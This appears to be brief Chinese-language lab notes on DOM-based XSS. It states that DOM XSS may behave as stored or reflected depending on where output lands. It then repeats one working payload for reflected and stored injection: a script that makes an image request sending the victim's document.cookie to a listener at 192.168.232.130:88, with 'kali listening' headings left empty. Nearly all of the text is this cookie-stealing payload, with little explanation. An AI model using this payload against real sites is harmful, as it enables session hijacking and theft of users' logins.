DOM型XSS
Document Object Model 文本对象模型xss、可能是存储型也可能是反射型、只决定于输出地方
在反射型XSS中输入:
<script>var img=document.createElement('img');img.src='http://192.168.232.130:88/log?'+escape(document.cookie);</script>
kali监听:
在存储型XSS中输入:
<script>var img=document.createElement('img');img.src='http://192.168.232.130:88/log?'+escape(document.cookie);</script>
kali监听:
目录